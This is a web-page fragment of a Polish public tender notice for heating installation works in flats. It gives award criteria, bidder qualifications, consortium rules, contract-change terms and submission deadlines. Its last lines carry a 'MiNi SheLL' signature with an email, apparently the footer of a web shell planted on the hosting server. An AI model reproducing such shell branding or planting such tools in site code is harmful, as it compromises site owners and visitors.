jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać Wykonawca, który nie podlega wykluczeniu o którym mowa w rozdziale XII oraz spełnia warunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej.<br/>2. Wykonawca spełnia niniejsze warunki jeżeli:<br/>1) w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał w sposób należyty i prawidłowo ukończył co najmniej 1 robotę budowlaną obejmującą swoim zakresem wykonywanie instalacji grzewczych, których źródłem zasilania był gaz i energia elektryczna, w co najmniej 3 lokalach mieszkalnych o wartości nie mniejszej niż 90 000,00 zł brutto. <br/>2) dysponuje co najmniej 2 osobami posiadającymi odpowiednie i aktualne świadectwo kwalifikacji uprawniające do:<br/>a) zajmowania się eksploatacją urządzeń wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczną na stanowisku eksploatacji „E” i dozoru „D” dla Grupy 1, zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>b) zajmowania się eksploatacją urządzeń wytwarzających, przetwarzających, przesyłających i zużywających ciepło na stanowisku eksploatacji „E” i dozoru „D” dla Grupy 3, zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>3) posiada potencjał techniczny pozwalający mu wykonywać zadanie zgodnie art. 68 ust. 3 ustawy o elektromobilności i paliwach alternatywnych (t.j. Dz.U. z 2022 poz. 1083 z późn. zm.) tj. w przypadku użycia do realizacji niniejszego kontraktu więcej niż 4 pojazdów będzie posiadać, wśród tych pojazdów, co najmniej 10% pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym.<br/>3. W zakresie warunku o którym mowa:<br/>1)	w pkt. 2 ust. 1: (dotyczącym ukończenia co najmniej 1 roboty budowlanej) Wykonawca spełni również warunek jeśli zrealizował w tym okresie 2 lub 3 oddzielne zadania na wymagany zakres, gdzie łączna suma zrealizowanych prac w lokalach mieszkalnych wynosi co najmniej 3 oraz łączna wartość wszystkich wykazywanych zadań wynosi co najmniej 90 000,00 zł brutto. <br/>2) w pkt. 2 ust. 2 (dotyczącym dysponowania co najmniej 2 osobami) Zamawiający nie wymaga, aby każda z wykazywanych osób posiadała łącznie wszystkie wyżej wymienione uprawnienia, przy czym każda z tych osób musi posiadać przynajmniej jedno z nich.<br/>3) w pkt. 2 ust. 3 (dotyczącym dysponowania co najmniej 10% pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym):<br/>a) udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym oblicza się stosując zasadę, zgodnie z którą wielkość udziału tych pojazdów poniżej 0,5 zaokrągla się w dół, a wielkość tego udziału 0,5 lub powyżej zaokrągla się w górę. Zgodnie z poniższymi przykładami:<br/>przykład 1: 1 pojazd – wskaźnik: 1 x 10% = 0,1 – wskaźnik 0,1 przy zaokrągleniu = 0<br/>przykład 2: 4 pojazdy – wskaźnik: 4 x 10% = 0,4 – wskaźnik 0,4 przy zaokrągleniu = 0<br/>przykład 3: 5 pojazdów – wskaźnik: 5 x 10% = 0,5 – wskaźnik 0,5 przy zaokrągleniu = 1<br/>b) w przypadku realizowania przez Wykonawcę wszystkich części, wymagania w zakresie stosowania ustawy liczą się do całości zamówienia, a nie w stosunku do każdej części oddzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania), podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, potwierdzających spełnienie warunków udziału w postępowaniu. <br/>2. Na wezwanie Zamawiającego, Wykonawca złoży:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu stanowi załącznik nr 8 do SWZ<br/>2) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, którego wzór stanowi załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W przypadku gdy Wykonawca zgodnie z art. 118 ustawy Pzp polega na zdolnościach innych podmiotów udostępniających zasoby:<br/>a) zobowiązanie podmiotu udostępniającego zasoby stanowiące załącznik nr 3 do SWZ;<br/>b) wypełnione Oświadczenie podmiotu udostępniającego – art. 125 ust. 1 stanowiące załącznik nr 4 do SWZ.<br/>2. w przypadku gdy Wykonawca zgodnie z art. 18 ust. 3 ustawy Pzp składa w ofercie informacje stanowiące tajemnice przedsiębiorstwa, uzasadnienie w którym wykaże, że przekazywane dokumenty są zastrzeżone. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (lider konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców wpisując ich dane. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną.<br/>2. Brak podstaw wykluczenia poprzez złożenie Oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp (załącznik nr 2 do SWZ) musi potwierdzić każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W przypadku Wykonawców występujących wspólnie, ocena spełniania warunku nastąpi na podstawie oświadczeń o których mowa w art. 125 (załącznik nr 2 do SWZ) podpisanych i złożonych przez każdego z Wykonawców. Ponadto zgodnie z art. 117 ust. 4 ustawy PZP Wykonawcy złożą w części formularza ofertowego oświadczenie, z którego będzie wynikać które roboty budowlane wykonają poszczególni Wykonawcy. W celu wykazania spełniania warunku dotyczącego doświadczenia Wykonawca musi wykazać, że co najmniej jeden z podmiotów wspólnie ubiegających się o udzielenie zamówienia wykonał wymagane roboty budowlane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje, że wprowadzenie zmian do zawartej Umowy będzie możliwe w przypadkach nie prowadzących do istotnej jej zamiany w rozumieniu art.454 Ustawy PZP oraz w innym przewidzianych prawem sytuacjach, w tym w szczególności w przypadku : <br/>1) omyłek pisarskich lub błędów rachunkowych, <br/>2) mających na celu wyjaśnienia wątpliwości treści Umowy, jeżeli będzie budziła ona wątpliwości interpretacyjne między stronami,<br/>3) konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych, lub w przypadku zmiany potrzeb Zamawiającego, chociażby wiązało się to ze zmianą wysokości wynagrodzenia, <br/>4) konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę spowodowanych w szczególności: <br/>a) wystąpieniem niekorzystnych warunków atmosferycznych przy których niemożliwe jest prowadzenie robót budowlanych zgodnie ze sztuką budowlaną, o ile Wykonawca wykaże, <br/>że okoliczności te miały bezpośredni wpływ na niemożność wykonywania świadczenia,<br/>b) wystąpieniem okoliczności siły wyższej, przy czym przedłużenie terminu wykonania zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania siły wyższej,<br/>c) skierowaniem przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia lub wydaniem zakazu prowadzenia robót budowlanych stanowiących przedmiot zamówienia przez właściwy organ władzy publicznej, o ile wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność; przy czym przedłużenie terminu nastąpi o liczbę dni odpowiadającą okresowi, na jaki Wykonawcy nakazano wstrzymania robót budowlanych lub zakazano prowadzenia tych robót, <br/>d) wystąpieniem kolizji z sieciami lub instalacjami nieujawnionymi w dokumentacji; przy czym przedłużenie terminu nastąpi o liczbę dni niezbędną na usunięcie kolizji,<br/>e) koniecznością wykonania robót dodatkowych lub zamiennych, które będą niezbędne <br/>do prawidłowego wykonania lub zakończenia robót objętych Umową,<br/>f) koniecznością wykonania dodatkowych badań lub ekspertyz, o czas niezbędny na ich wykonania i uzyskania ewentualnych decyzji lub uzgodnień z nimi związanych,<br/>5) jeżeli zmiany Umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego, <br/>6) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia,<br/>7) zmiany wartości brutto wynagrodzenia Wykonawcy, w przypadku zmiany ustawowej wysokości (stawki) podatku od towarów i usług,<br/>8) wprowadzenia, zmiany lub rezygnacji z Podwykonawcy, z tym zastrzeżeniem, że jeżeli zmiana lub rezygnacja z Podwykonawcy dotyczy podmiotu, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 118 Ustawy PZP, w celu wykazania spełnienia warunków udziału w postępowaniu, przed zmianą Umowy Wykonawca zobowiązany jest wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia, <br/>9) innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/zbilkgdynia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com